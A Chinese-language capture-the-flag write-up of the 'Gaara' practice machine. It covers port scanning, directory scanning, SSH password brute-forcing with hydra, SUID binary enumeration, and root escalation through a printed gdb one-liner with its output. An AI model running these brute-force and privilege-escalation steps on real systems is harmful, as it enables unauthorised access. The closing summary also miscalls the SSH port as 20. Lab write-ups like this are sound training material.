Offensive Security-1.Gaara-SSH爆破,利用SUID提权
Offensive Security | Control Panel (offensive-security.com)(需注册登录)
题目名为Gaara
主机ip:192.168.52.142
首先切换为root用户,密码为kali
nmap扫描
22端口和80端口开着
22为ssh端口,用于SSH远程链接,攻击方向为爆破,SSH隧道及内网转发 文件存储
80为web服务端口,一般进行Web攻击,爆破,对应服务器版本漏洞
web 敏感目录扫描
使用 curl命令看能否访问ip地址
curl是一个利用URL规则在命令行下工作的文件传输工具,可以说是一款很强大的http命令行工具。它支持文件的上传和下载,是综合传输工具,但按传统,习惯称url为下载工具
语法:# curl [option] [url]
执行curl 192.168.52.142
执行后,192.168.52.142 的html就会显示在屏幕上了
浏览器中也可以看到,是动漫人物Gaara的图片
使用dirbuster扫描敏感目录
当然也可以用在线网站Webscan或者其他软件扫描
看看有没有敏感目录文件
(自带的字典在/usr/share/dirbuster/wordlists下)
很遗憾没有扫出来
SSH利用
SSH暴力破解
网站没有敏感目录,接下来只有ssh端口可以利用,从web网站得到的唯一信息就是gaara这个名字,猜测此名称为SSH登录时的用户名
接下来尝试使用字典进行爆破
使用kali里的hydra,加上kali自带的字典比如/usr/share/wordlists/metasploit/unix_passwords.txt
输入如下命令
-l 表示单用户
-P表示多密码,需要填写路径
-f成功一个就停止
跑出密码了
现在可以登录ssh了
root@kali:/home/kali# ssh gaara@192.168.52.142
gaara@192.168.52.142's password:
···
gaara@Gaara:~$ id
uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)
suid提权
SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。
如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。
以下命令可以发现系统上运行的所有SUID可执行文件。具体来说,命令将尝试查找具有root权限的SUID的文件。
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
输入命令后可以看到以下文件具有SUID权限
在GTFOBins可以查看哪些能提权,哪些能维持权限
经过搜索发现gdb可以提权
执行/usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit看看
成功获取root权限
gaara@Gaara:~$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
···
For help, type "help".
Type "apropos word" to search for commands related to "word".
# whoami
root
最后获取flag
总结
学到了
-
20为ssh端口,80为http协议端口
-
curl命令
-
dirbuster使用
-
hydra爆破
-
登录ssh
-
suid提权
